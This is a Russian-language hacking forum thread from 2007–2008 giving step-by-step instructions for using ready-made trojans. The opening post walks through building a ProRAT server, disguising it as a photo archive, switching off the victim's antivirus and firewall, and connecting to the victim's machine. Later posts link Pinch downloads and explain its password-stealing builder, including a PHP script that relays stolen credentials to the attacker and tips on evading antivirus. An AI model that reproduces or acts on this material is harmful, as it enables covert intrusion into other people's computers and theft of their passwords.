в этой теме мы будем обсуждать вырусы которые вы нашли в интернете но незнаете как ими пользоватся...
ТРОЯНЫ пользование уже готовыми...
Сообщений 1 страница 20 из 68
Поделиться22007-12-05 17:18:35
я покажу пример использования одного...
называется proRAT!
довольно интересная штуковина... но ксожалению уже палится антивирусками (почти всеми) но при правильной криптовке не запалятся...
и так для того что бы взломать жертву на необходимо знать её IP и закинуть ей трой...
мы просто делаем терминал (ниже будет показано как) и отсылаем по асе\мылу этот терминал жертве, она запускает всё!
мы открываем базовый терминал, вводим айпи инажимаем "конект" далее по усмотрению форматнуть, удалить, читать, взорвать, нагадить...
и так как же всё это делать?!
воть как:
мы качаем файл в котором находится одна единственная програмулина... а должно быть две! неволнуйтесь)
запускаем то что есть...
(там попросит регистрацию в которую вводим то что написанно в присоединенном к архиву (то что скачали) блокнотовском документе)
зарегистрировали и запускаем!
видим вот что....
идем в вкладку языкаи выбираем руский... на картинку там где написанно "русиан"
и так нам надо создать терминал который мы кинем жертве!!!
нажимаем вкладку "создать" внизу списка...
видим:
и нажимаем "создать прорат сервер"
появится окно настройки....
вот такое:
вкладка "уведомления"
там ставим птички везде кроме последней и указываем СВОИ данные...
первая птичка - скрытие вашего IP
вторая - отправка вам на мыло информации о жертве
третья - отправка тех же данных в асю вам!
четвертая - ставить ненадо потому что это какая-то ху*ня...
переходим к вкладке "основные настройки"
там:
порт - нетрогаем!!!
пароль - ставим свой! (при подсоединении к жертве вас спросит пароль)
имя - жертвы будет отображатся в письмах на мыле....
выводить сообщение об ошибке - настройте сами...
примечание: допустим вы сказали жертве что пришлете фотку(заархивировануюRAR\ZIP) ставите иконку сервера(далее будет описанно) такую как иконка архива
и в сообщениях об ошибке пишем что-то типа архив поврежден...
таким образом жертва запустит терминал и увидит только сообщение о том что архив поврежден
и нагнет на вас матов за такую фигню.. извинитесь и пришлите уже нормальный архив с таким же названием но без терминала а с фоткой...
обман? - нет! социальная инженерия! :cool:
в остальном просто проставте все птички... там настройка спрашивает отключать ли антивири и фаерволы...
так-что просто поставте все галочки и непарьтесь...
перейдем к вкладке "прикрепить к файлу"
терминал который мы кидаем жертве можно прикрепить к какому-либо файлу который будет открыватся с ним...
тоесть вы шлете "сшитый" файл и прикрепляете к нему соответствующую иконку при получении жертва запускает файл получает на весь экран обещаную картинку и даже незамечает что вместе с ним запустился и терминал... (в таком случае ненадо выставлять сообщение о повреждении архива)
переходим к вкладке "розширения сервера" зачастую у всех они закрыты но навсякий случай перестрахуемся... так-как спрятать полностью нельзя ставим "CSR" или "ЕХЕ"
я советую ЕХЕ (лучше срабатывает запуск)
смотрим как:
после того как мы поставили нравящееся нам розширение
переходи к вкладке "значок сервера"
там выбираем значек соответствующий пришитому файлу или тому что вы будете чесать жертве...
после того как всё поставленно так как надо вам нажимаем кнопку "создать сервер"
он сохранится в той директории где лежит и базовый терминал...
посылаем жертве терминал который создали!
после успешной передачи и когда жертва скажет что архив "битый"
просим прощения шлем нормальную информацию...
когда жертва удовлетворена получением просим прислать и вам что-то... (при этом переписка должна происходить в квипе (qip) так-как он при пересылке вам файла показует IP отправляющего! тобешь то что вам и надо!!!
принимаете присланное и копируете айпи в базовый терминал.... там где поумолчанию и на картинке 1 написанно 127.0.0.1
жмем "соединится" и выскакивает табличка с прозьбой пароля!
туда вводим пароль который был указан при создании терминала (сервера прорат)
парольввели и внизу видим надпись "соединение установлено"
вот и все! вы в компе у жертвы!
нажимаем поочередно вкладки с приколами и пользуемся всем)
нажимаем вкладку приколы и жмем на кнопку "открыть сидиром"
короче всё чего душа желает)
примерно по такому принципу работают все программы такого рода...
удачных вам канегтав!
Поделиться32007-12-05 17:59:36
сам трой мона скачать легко... прописав в поисковике название....
Поделиться42007-12-06 18:20:03
сделай проще у себя размести все програмы под объеснением
Поделиться52007-12-07 12:07:01
немогу...
Поделиться62007-12-30 22:15:57
качаем: proRAT
качаем с офф-сайта сам трой и к нему руский модуль...
фсе файлы складываем в одну папку и ток тогда запускаем...
обратите внимание на то что пароль на архив "pro"
Поделиться72007-12-31 00:18:45
Озя, я думаю это то о чём мечтали все ламеры и чайники) Просто более полной статьи по использованию данного троя я не видел!! Респект.
Поделиться82007-12-31 00:21:41
спасибо!
Поделиться92007-12-31 02:05:25
Пинч, пока тока версия 2.96
http://www.xakepy.ru/attachment.php?att … 1191094455
http://www.xakepy.ru/attachment.php?att … 1191094455
Отпишитесь кто юзал.
Вот и 3 версия.
http://portal-net.i7i.ru/file/?fileid=1570
Отредактировано LUMEN (2007-12-31 02:13:03)
Поделиться102008-01-09 01:09:27
я юзал... если хо напишу что к чему...
Поделиться112008-01-09 12:06:29
я юзал... если хо напишу что к чему...
Давай
Поделиться122008-01-12 00:54:17
Хм, трой работает у меня на 2000 винде т.е. получается сконектится с другой машиной из нета. А вот из под XP у меня не идёт, собираю сервер отправляю , жертва запускает. но потом нет конекта. Фаерволы отключил, ip верный , порт не менял (5110) Причём когда в настройках сервера там где идёт уведомление на емайл и аську нажимаю "тест" и он выкидывает мессагу "RequestDone Rq=8 Error=10060" типа хост не отвечает.
Кстати когда чувачёк запускает сервер у него типа "ничего не происходит" даже не выскакивает сообщение об ошибке которое я сам писал. Главное когда я запускаю сервер он работает на ура)) В чём ошибка? Может сам прорат криво встал??
Поделиться132008-01-12 15:48:58
та он вродь и неможет встать криво)
Поделиться142008-01-12 20:10:30
тада в чём проблема? кстати у тя работает??
Поделиться152008-01-15 18:31:33
инстукция по применению пинча:
===========
Возможности
===========
Данный троян получил довольно большое распространение в 2003/2004 году. Все благодаря возможности красть большое кол-во паролей (ICQ99b-2003a/Lite/ICQ2003Pro, Miranda IM, Trillian ICQ&AIM, &RQ, The Bat!, The Bat! 2, Outlook/Outlook Express, IE autocomplete & protected sites & ftp (9x/ME/2000/XP), FAR Manager (ftp), Win/Total Commander (ftp), RAS (9x/Me/2k/xp supported)), маленькому весу, открытым исходникам и легкостью создания троя для конкретной задачи. Троян имеет следующие возможности:
- Отправлять конфигурацию компьютера жертвы: ОС, оператика, CPU, HDD, logged user, host name, IP
- Шпион клавиатуры (Key-log)
- Удаленная консоль (Remote console)
- Обход Firewall`а
- Отправка всех паролей на E-mail используя SMTP-сервер
- Шифрование украденных паролей пересылаемых по почте
- Автоудаление трояна после запуска
- HTML/Text отчеты
- Размер файла примерно 10Kb
- Модульная система
- И многое другое...
Троян написал coban2k (http://www.cobans.net) - довольно известный человек в мире ICQ-хакинга. По причине проблем с хостингом по поводу хранения трояна на их сервере, автор был вынужден убрать это творение с своего сайта. Однако троян вы всегда можете найти на сайте (http://www.web-hack.ru/download/info.php?go=49). К сожалению уже почти все антивирусы находят этот трой и его можно впарить только жертве, у которой не стоит антивируса.
============
Комплектация
============
В архив (pinch_1.0.zip) с трояном входят следующие папки и файлы:
\PinchBuilder.exe - мастер для создания трояна
\Parser.exe - программа для расшифровки закодированных писем с паролями
\readme.txt - без комментариев
\Pinch\ - главная папка с asm-исходниками трояна и компилятором
\Sources\ - остальные исходники
\TB!2 Plugin (Auto-parser)\ - папка с плагином для The Bat 2!, который декодирует зашифрованные письма с паролями, приходящими на ваш почтовый ящик
\Sources\Script\ - PHP-скрипт, через который отсылаются пароли при выборе соответствующей опции при компиляции (читайте далее)
================
Компилируем трой
================
В комплекте поставляется специальный мастер (PinchBuilder.exe), который и занимается созданием трояна по вашим требованиям и компиляцией трояна прямо на вашем компьютере. Программа имеет две главные вкладки: Compile и Decrypt. Первая служит для создания трояна, а вторая для расшифровки паролей (по сути эта вкладка является результатом работы файла Parser.exe). Далее идут три под-вкладки: SMTP, HTTP и FILE. В них задаются вариант вывода паролей. Разберем каждую подробнее:
====
SMTP
====
В поле Server вводим адрес (hostname/ip) SMTP-сервера. Если вы ввели домен сервера, то нажмите Resolve, чтобы домен сервера принял вид IP-адреса. Далее в полях From и To указываем свое мыло. Кнопка Send test massage служит для тестовой отправки письма, через настройки указанные вами. Настоятельно рекомендую ей воспользоваться. Если письмо не приходит, то это значит, что есть какие то проблемы с отправкой (включенный фаерволл, плохой SMTP, не нажали на Resolve и т.д.).
Хочу заметить, что последнее время большинство провайдеров переходят на систему, по которой их клиенты могут отправить письма ТОЛЬКО с ИХ SMTP-вервера. В таких случаях рекомендую пользоваться методом отправки писем, через HTTP.
====
HTTP
====
Закачиваем файл \Sources\Script\view.php на сервер поддерживающий PHP-скрипты и исполняющие функцию mail(). Далее в поле URL указываем путь к этому скрипту (например, http://www.xss.ru/pinch.php). В поле Subject указываем имя темы, с которой будут оправляться письма. В поле Status check str должна находиться строка, которая выдается скриптом после его загрузки. В скрипте идущем в комплекте с троем оно имеет значение: _ret_ok_1 :
<script language="JavaScript">
window.status="_ret_ok_1";
</script>
Если данное значение не будет принято трояном, то он будет пытаться отправить письмо через этот скрипт каждую минуту, пока не получит в ответ строку из поля Status check str. Я вам рекомендую использовать скрипт не из стандартной поставки, а написанный мной:
<html><body>
<?php
// Author: Terabyte (http://www.web-hack.ru)
$email=$_POST['a'];
$subject=$_POST['b'];
$msg=$_POST['c'];
if (isset($email) and isset($subject) and isset($msg)) {
mail($email,$subject,$msg, "From: $email");}
?>
<script language="JavaScript">
window.status="_ret_ok_1";
</script>
</body></html>
Делает он почти тоже самое, но более грамотно написан. Огромным плюсом при использовании данного метода отправки паролей являеся, тот факт, что он позволяет отправлять пароли в обход Firewall`а. Как это достигается? Вот вырезка из лога outpost`а в момент отправки пароля через скрипт с моего сайта:
Имя процесса: iexplorer.exe
Протокол: HTTP
Удаленный адрес: wwwweb-hack.ru
Я думаю все поняли, кто не в танке =) Так же из плюсов я могу я могу выделить возможность записывать зашифрованные письма на вашем сайте, а не отправлять на мыло; возможность менять мыло на которое отсылаются пароли, на случай если его удалят; при массовой рассылке троя (чтобы пароли могли быть отправлены даже с тех провайдеров, где отключен доступ ко всем SMTP-серверам, кроме их него)
====
FILE
====
На данный вкладке задается путь к файлу, в который сохранятся все пароли. Для этого в поле Path надо записать путь к файл (например, C:\password.txt).
================
Compiler Options
================
В данной области все понятно, тут надо просто поставить галочки в тех полях, где вам это требуется. Стоит обратиться внимание на поле Add Icon. В нем указывает путь к иконке с которой будет отображаться скомпилированный троян. Хочу заметить что на моей системе (Windows XP) мне так и не удалось скомпилировать троя с этой включенной опцией и ее пришлось отключить.
В полях Protocol указываем метод, которым будут отправляться пароли (SMTP/HTTP/FILE). Далее нажимаем кнопку Compile и должна пойти компиляция трояна, который сохранится в основную папку с мастером для его создания.
===================
Расшифровка паролей
===================
Допустим вам удалось впарить ламеру этот трой и вам на мыло пришли пароли с машины жертвы. Дело в том, что при пересылке пароли шифруются и их для начала надо расшифровать (если у вас не установлен специальный плагин к TheBat! описанный выше). Копируем в буфер обмена текст с закодированными паролями, открываем Parser.exe (или вкладку Decrypt в PinchBuilder.exe) и нажимаем в контекстном меню пунк Process Data (или просто нажимаем комбинацию клавиш Alt+C). Далее программа выдаст вам все данные украденные у жертвы с удобном виде. Далее вы можете их сохранить или распечатать.
нагло содрано у "Terabyte | http://www.web-hack.ru | 27.03.2004"
Поделиться162008-01-18 21:24:39
Pro Rat троян суперский, спасибо Ozia инструкция кулл, pinch3 тоже круто описал помогло.
я могу посоветовать ALB (anti-lamer BackDoor) попробовал суперский просто!
Поделиться172008-01-18 21:26:34
жаль только они все палятся...
зы: без криптовки.
Поделиться182008-01-20 14:37:31
жаль только они все палятся...
зы: без криптовки.
Криповщик стоит 50$...есть челы в нете у которых он есть, они криптуют твой пинч за 5$ и он не палится)))
А вообще в pinch3 проблем меньше)) кстати он от qip и миранды пароли не тащит!!!
А чё в пинче есть келогер???=)))))))))))
Поделиться192008-01-21 00:34:36
давайте тада подумаем над написанием своего криптора? вообще как идею...
допустим если писать то как и что)
Поделиться202008-01-21 02:26:24
Думаю что идея неплохая...
Похожие темы
что есть троян? | Вопрос >>> ответ!!! | 2008-05-31 |
тупость юзеров читать всем. | Трепимся про что угодно... | 2008-11-19 |